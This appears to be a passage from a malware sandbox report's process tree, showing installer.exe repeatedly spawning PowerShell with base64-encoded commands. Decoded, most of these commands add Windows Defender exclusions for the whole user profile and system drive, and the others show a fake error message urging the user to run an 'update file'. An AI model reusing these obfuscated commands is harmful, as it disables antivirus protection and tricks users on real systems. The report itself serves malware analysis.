        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        52⤵
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        52⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        53⤵
        
        PID:948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        53⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        53⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        54⤵
        
        PID:5188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        54⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        54⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        55⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        55⤵
        
        PID:5564
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        55⤵
        
        PID:5612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        56⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        56⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        56⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        57⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        57⤵
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        57⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        58⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        58⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        58⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        59⤵
        
        PID:604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        59⤵
        
        PID:3836
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        59⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        60⤵
        
        PID:3896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        60⤵
        
        PID:6036
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        60⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        61⤵
        
        PID:4388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        61⤵
        System Location Discovery: System Language Discovery
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        61⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        62⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        62⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        62⤵
        
        PID:6172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        63⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        63⤵
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        63⤵
        
        PID:6332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        64⤵
        
        PID:6384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        64⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        64⤵
        
        PID:6440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        65⤵
        
        PID:6492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        65⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        65⤵
        
        PID:6180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        66⤵
        
        PID:6236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        66⤵
        
        PID:6324
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        66⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        67⤵
        
        PID:6528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        67⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        67⤵
        
        PID:6636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
